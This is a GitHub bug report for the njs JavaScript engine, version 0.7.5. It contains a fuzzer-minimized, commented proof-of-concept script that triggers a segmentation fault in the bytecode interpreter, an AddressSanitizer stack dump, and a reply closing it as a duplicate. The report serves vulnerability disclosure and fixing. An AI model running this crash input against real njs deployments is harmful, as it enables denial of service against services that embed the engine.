SEGV src/njs_vmcode.c:1006:37 in njs_vmcode_interpreter #526

Closed
dramthy opened this issue Jun 1, 2022 · 1 comment


dramthy commented Jun 1, 2022

Environment

Commit  : c62a9fb92b102c90a66aa724cb9054183a33a68c
Version : 0.7.5
Build   : 
     ./configure --cc=clang --address-sanitizer=YES     
     make

Proof of concept

// Minimizing 6789E152-A951-4E52-897A-6064FED934A6
/**
 * Unused stub carried over from the minimized fuzzer case.
 * It is never called anywhere in the reproducer and has no effect.
 * @returns {undefined}
 */
function placeholder() {
  // intentionally empty
}
/**
 * Entry point of the fuzzer-minimized reproducer for the SEGV reported above.
 *
 * The code below is kept byte-for-byte on purpose: the fault is inside the
 * bytecode interpreter, and restyling would change the code the VM executes
 * and may stop it from reproducing. Only comments have been added.
 *
 * Shape of the run, read together with the stack dump at the bottom of the
 * report: main() calls v0(), which suspends at its first `await`; the crash
 * is raised when the interpreter is re-entered from njs_await_fulfilled to
 * continue v0's body (frames #0/#1 of the dump).
 */
function main() {
// v1..v3 are never read; v0 is invoked with no arguments at the end of main().
async function v0(v1,v2,v3) {
    // Awaiting a non-promise (the ReferenceError constructor) still suspends
    // v0 here. Everything after this line runs on resumption, which is the
    // njs_await_fulfilled -> njs_vmcode_interpreter path in the stack dump.
    var v5 = await ReferenceError;
    // v6 is only reached through v307's recursion (see the end of v0);
    // v7/v8 are never read.
    function v6(v7,v8) {
        var v10 = [-904640.292473976];
        var v12 = [956755363,956755363,956755363,956755363,956755363];
        // Compound assignment to a far out-of-range index of v12 with an
        // array operand (coerced to a number by `|=`). v12 is later handed to
        // AggregateError() at the end of v6.
        v12[1323912014] |= v10;
        // The v20..v69 template literals below are plain strings: nothing
        // evaluates or even reads them, so they are inert leftovers of the
        // minimization and play no part in the crash.
        var v20 = `
            var v21 = Object(-9007199254740993,-4027512271n);
        `;
        var v26 = `
            var v27 = (-256n)(-9007199254740993,-4027512271n);
        `;
        var v37 = `
            Object[-4027512271] **= -4027512271n;
            var v39 = Object(-9007199254740993,...-65536n);
        `;
        var v43 = `
            var v44 = Object(-9007199254740993,-4027512271n);
        `;
        var v47 = `
            var v48 = Object(-9007199254740993,-9007199254740993n);
        `;
        var v52 = `
            var v53 = undefined(-1290018985n,-4027512271n);
        `;
        // Only mentioned inside the v274 string below; never used as a value.
        var v59 = [-1000000.0,-1000000.0,-1000000.0];
        var v67 = `
            var v68 = (-1.7976931348623157e+308)(8980,-4027512271n);
        `;
        var v69 = `
            (-4027512271n)[-4027512271] **= -4027512271n;
            var v70 = Object(0n,-4027512271n);
        `;
        // Defined but never called.
        function v76(v77) {
            v77[1866532165] = Map;
        }
        // Promise executor for v250 (`new Promise(v78)` below); it runs
        // synchronously inside that constructor call. v79/v80 (resolve, reject)
        // are never used, so v250 can only settle by the executor throwing.
        function v78(v79,v80) {
            var v87 = new Uint8ClampedArray();
            var v90 = {};
            var v91 = /gL8?/;
            var v92 = {};
            var v93 = [v90,v92,v91];
            // Ignores its argument; writes Map at a far out-of-range index of v93.
            function v95(v96) {
                v93[1866532165] = Map;
            }
            // Used only as the setter in the v112 descriptor below.
            async function v99(v100,v101) {
                var v102 = await Map;
            }
            // Executor that never settles: v107 stays pending.
            function v103(v104,v105) {
            }
            var v107 = new Promise(v103);
            // .catch() with no handler yields a derived promise, v109.
            var v109 = v107["catch"]();
            // Accessor descriptor: reading v109.constructor calls Promise as a
            // plain function (no `new`, which is a TypeError per spec); writing
            // it calls v99.
            var v112 = {"get":Promise,"set":v99};
            var v113 = Object.defineProperty(v109,"constructor",v112);
            // Per spec, awaiting a promise object reads its `constructor`
            // property, so `await v113` presumably goes through the accessor
            // defined just above - worth confirming against the njs await path.
            async function v114(v115,v116) {
                var v117 = await v113;
            }
            var v118 = v114();
            var v119 = v95(Map);
            var v120 = String();
            // v131..v247 template literals: inert strings, same as in v6.
            var v131 = `
                var v132 = Object(-9007199254740993,-4027512271n);
            `;
            var v133 = `
                (-4027512271n)[-4027512271] **= -4027512271n;
            `;
            var v139 = `
                var v141 = [-4027512271n,Object,-4027512271n,1,v87,-4027512271n,Object,Uint8ClampedArray,8980,Object];
                var v142 = Object();
                v142[-4027512271] **= -4027512271n;
            `;
            var v149 = `
                var v150 = Object(-9007199254740993,-4027512271n,0,-4027512271n);
            `;
            var v157 = `
                var v158 = Object(-9007199254740993,-4027512271n,15034n);
            `;
            var v161 = `
                var v162 = Object(-4294967296,-4027512271n);
            `;
            var v170 = `
                var v171 = (-4027512271n)(-9007199254740993,-4027512271n);
            `;
            var v181 = `
                Object[-4027512271] **= -4027512271n;
                var v183 = Object(-9007199254740993,-4027512271n);
            `;
            var v185 = `
                var v186 = Object(-9007199254740993,-9007199254740993n);
            `;
            var v190 = `
                var v191 = undefined(-4027512271n,-4027512271n);
            `;
            var v196 = `
                var v197 = "bigint"();
                v197[-4027512271] **= -4027512271n;
                var v198 = Object(-4027512271n,-4027512271n);
            `;
            var v199 = `
                (-4027512271n)[-4027512271] **= -4027512271n;
                var v200 = Object(-9007199254740993,-4027512271n);
            `;
            var v204 = `
                var v205 = ReferenceError(-4027512271n,-4027512271n);
            `;
            // Calling a typed-array constructor without `new` is a TypeError
            // per spec; if njs follows that, the executor aborts here (rejecting
            // v250) and the remaining lines of v78 never run.
            var v208 = Float64Array();
            var v213 = `
                v208[-4027512271] **= -4027512271n;
                var v214 = Object(-9007199254740993,-4027512271n);
            `;
            var v215 = `
                var v216 = Object(-4027512271n,-4027512271n);
            `;
            var v220 = `
                var v221 = (-1070059123)(-9007199254740993,-4027512271n);
            `;
            var v222 = `
                var v223 = ArrayBuffer(-4027512271n,-9007199254740993n);
            `;
            var v229 = `
                var v230 = undefined(-4027512271n,-4027512271n,Uint8ClampedArray,8980,-4027512271n);
            `;
            var v235 = `
                var v236 = (-4027512271n)();
                var v237 = v236(0n,-4027512271n);
            `;
            var v241 = `
                var v243 = Object();
                v243[-1316174388] >>= -4027512271n;
                var v245 = Object["getPrototypeOf"](v120,-4027512271n);
                var v246 = Object(-4027512271n,-4027512271n);
            `;
            var v247 = `
                (-4027512271n)[-4027512271] **= -4027512271n;
                var v248 = Symbol(-9007199254740993,-4027512271n);
            `;
            // Adds a property on the Promise constructor object itself.
            Promise[-4294967297] = Map;
        }
        var v250 = new Promise(v78);
        var v258 = Object();
        // v259..v304 template literals: inert strings, never evaluated.
        var v259 = `
            var v260 = Object(-9007199254740993,-4027512271n);
        `;
        var v261 = `
            var v262 = v261();
            v262[-4027512271] **= -4027512271n;
            var v263 = Object(v258,-4027512271n);
        `;
        var v264 = `
            Object[-4027512271] **= -4027512271n;
            var v266 = (-4027512271n)(-9007199254740993,-4027512271n);
        `;
        var v270 = `
            var v271 = (-4027512271n)(-9007199254740993,-2147483649n);
        `;
        var v274 = `
            var v275 = (-4027512271n)(v59,-4027512271n);
        `;
        var v281 = `
            var v282 = Error(-9007199254740993,3272380054n,Uint8ClampedArray,8980,0n);
        `;
        var v286 = `
            var v287 = (-4027512271n)(-9007199254740993,-4027512271n);
        `;
        var v288 = `
            var v290 = Object();
            v290[-4027512271] **= -767560483n;
            var v291 = Object(-4027512271n,-3242169687n);
        `;
        var v292 = `
            (-4027512271n)[-4027512271] **= -4027512271n;
            var v293 = Object(-9007199254740993,-4027512271n);
        `;
        var v297 = `
            var v298 = (-9007199254740993)();
            v298[-4027512271] **= -4027512271n;
            var v299 = v298(0n,-4027512271n);
        `;
        var v304 = `
            undefined[-4027512271] **= -4027512271n;
            var v305 = Object(...-2691822435,2828643507n);
        `;
        // AggregateError called as a plain function with the (now sparse) v12
        // as its errors iterable.
        var v306 = AggregateError(v12);
    }
    // Promise executor for v313. It recurses unconditionally on its last
    // line, so there is no base case: level 1 calls resolve and recurses with
    // (reject, v6); level 2 calls reject and recurses with (v6, v6); every
    // level from the third onward calls v6() and recurses with (v6, v6)
    // again, until the engine's call-depth limit stops it. This is where
    // v6 - and everything inside it - gets executed.
    function v307(v308,v309) {
        var v310 = v308();
        var v311 = v307(v309,v6);
    }
    var v313 = new Promise(v307);
}
// Runs synchronously only up to the `await` in v0; the rest of v0 is
// scheduled as a reaction job.
var v314 = v0();
}
// Kick off the reproducer. main() itself returns normally; the fault is
// raised later, on the job that resumes v0 (see the stack dump below).
main();
// CRASH INFO
// ==========
// TERMSIG: 11

Stack dump

AddressSanitizer:DEADLYSIGNAL
=================================================================
==9460==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x000000505060 bp 0x7ffc53e30aa0 sp 0x7ffc53e302e0 T0)
==9460==The signal is caused by a WRITE memory access.
==9460==Hint: address points to the zero page.
    #0 0x505060 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:1006:37
    #1 0x660085 in njs_await_fulfilled /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_async.c:91:11
    #2 0x575aae in njs_function_native_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:728:11
    #3 0x573b30 in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:766:16
    #4 0x573b30 in njs_function_call2 /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:592:11
    #5 0x64c5f3 in njs_function_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.h:178:12
    #6 0x64c5f3 in njs_promise_reaction_job /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_promise.c:1171:15
    #7 0x575aae in njs_function_native_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:728:11
    #8 0x573e1c in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:766:16
    #9 0x4f9c12 in njs_vm_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:428:12
    #10 0x4f9c12 in njs_vm_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:412:12
    #11 0x4f9c12 in njs_vm_handle_events /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:572:19
    #12 0x4f9c12 in njs_vm_run /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:532:12
    #13 0x4df763 in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:1172:15
    #14 0x4e007f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:836:11
    #15 0x4ddbe8 in main /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:483:15
    #16 0x7ff15c0cf082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee)
    #17 0x41ea7d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-target/build/njs+0x41ea7d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:1006:37 in njs_vmcode_interpreter
==9460==ABORTING

Credit
dramthy(@topsec alpha)


xeioex commented Jun 2, 2022

Duplicate of #506.
